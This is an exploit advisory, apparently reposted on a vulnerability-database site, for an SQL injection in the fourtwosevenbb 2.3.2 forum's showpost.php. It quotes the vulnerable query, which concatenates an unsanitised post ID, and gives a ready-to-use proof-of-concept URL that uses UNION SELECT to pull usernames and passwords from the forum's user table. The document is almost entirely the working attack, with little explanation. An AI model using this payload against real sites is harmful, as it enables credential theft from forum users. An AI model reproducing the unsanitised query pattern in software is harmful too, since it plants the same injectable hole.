[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ] ######################################################################## #Download Script : http://sourceforge.net/projects/fourtwosevenbb/files/ ######################################################################## ######################################################################## #3rr0r: ./fourtwosevenbb-2.3.2/showpost.php # # <?php #line 118: $sql = "SELECT ID, UserName, Post, UTime, IP, InReplyTo, ThreadID From " . $t_prefix . "Posts WHERE ID=$post_id"; #line 119: #line 120: $res = mysql_query($sql); # ?> ######################################################################## ######################################################################## #PoC : http://server/[path]/showpost.php?ForumID=1&post=[SQL] # http://server/[path]/showpost.php?ForumID=1&post=1%20union%20select%201,UserName,3,4,5,Password,7%20FROM%20427bb_personal%20WHERE%20ID=1-- ######################################################################## [ Gorontalo / 2009 ]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论